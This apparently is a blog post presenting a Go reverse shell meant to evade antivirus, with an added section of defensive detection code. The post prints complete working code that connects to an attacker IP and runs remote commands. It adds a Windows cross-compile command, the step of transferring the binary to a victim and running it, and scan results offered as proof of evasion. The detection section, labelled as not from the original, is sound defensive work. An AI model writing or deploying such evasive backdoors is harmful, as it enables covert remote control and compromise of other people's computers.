Undetectable Reverse shell with golang

2 min read · Feb 21, 2019

I was exploring different methods to evade AV engines, which would be helpful during pen-testing engagements. Most malware is written in C#, C++ and Python (because it supports cross-platform). Most of the PowerShell and DDE injection methods were detected by AV solutions, so I thought of giving golang a try, because Go has many features such as concurrency and it is also compiled to machine code, so it has good performance.

Getting Started

All we need is a simple script that connects to a network port, reads input from it, executes the command, and redirects stdout and stderr to the same network socket.

package main

import (
	"bufio"
	"fmt"
	"net"
	"os/exec"
	"strings"
)

func main() {
	conn, _ := net.Dial("tcp", "10.1.75.200:8081")
	for {

		message, _ := bufio.NewReader(conn).ReadString('\n')

		out, err := exec.Command(strings.TrimSuffix(message, "\n")).Output()

		if err != nil {
			fmt.Fprintf(conn, "%s\n", err)
		}

		fmt.Fprintf(conn, "%s\n", out)

	}
}

Source:

https://github.com/sathish09/rev2go

We can build the Go file for any target by specifying the OS and architecture.

env GOOS=windows GOARCH=386 go build hello.go

Start the listener on the attacker box, transfer the file to the victim machine, and run it.

Windows Defender Scan Results

We will get a reverse connection once the victim runs the executable.

Reverse Connection

AV Scan Results:

Hybrid Analysis
VirusTotal Results
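
An added example, not from the original post or the rev2go repository: the program above connects out over TCP and then starts one child process per line it receives, a sequence that endpoint telemetry records independently of any file-scan verdict. The Go code below flags that sequence in constructed events; the `Event` schema, the `Suspects` function, the time window and the child-count threshold are assumptions made for illustration.

```go
package main

import (
	"fmt"
	"sort"
	"time"
)

// Event is a simplified, hypothetical endpoint record: Kind "net" is an
// outbound TCP connect by PID, Kind "proc" is PID being created by PPID.
type Event struct {
	At        time.Duration // offset from start of capture
	Kind      string
	PID, PPID int
	Detail    string // remote address or child command line
}

// Suspects returns PIDs that created at least minChildren processes within
// window of their most recent outbound connect. evs must be in time order.
func Suspects(evs []Event, window time.Duration, minChildren int) []int {
	connected := map[int]time.Duration{} // PID -> time of latest connect
	children := map[int]int{}            // PID -> children seen in window
	for _, e := range evs {
		if e.Kind == "net" {
			connected[e.PID] = e.At
		} else if t, ok := connected[e.PPID]; ok && e.Kind == "proc" && e.At-t <= window {
			children[e.PPID]++
		}
	}
	var out []int
	for pid, n := range children {
		if n >= minChildren {
			out = append(out, pid)
		}
	}
	sort.Ints(out)
	return out
}

// sample is constructed telemetry: PID 4120 behaves like the program above,
// PID 900 connects out but never spawns a child, PID 700 never connects.
var sample = []Event{
	{1 * time.Second, "net", 4120, 0, "10.1.75.200:8081"},
	{2 * time.Second, "net", 900, 0, "203.0.113.7:443"},
	{5 * time.Second, "proc", 5001, 4120, "whoami"},
	{9 * time.Second, "proc", 5002, 4120, "hostname"},
	{9 * time.Second, "proc", 5003, 700, "notepad"},
}

func main() { fmt.Println(Suspects(sample, time.Minute, 2)) }
```

Legitimate software such as updaters and build tools shows the same sequence, so a rule like this needs an allowlist of expected parent images before it is used for alerting.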

So what’s next?

Implement encryption and memory protection. Make it more interactive. Build a post-exploitation framework and whatnot. Go is awesome 😉
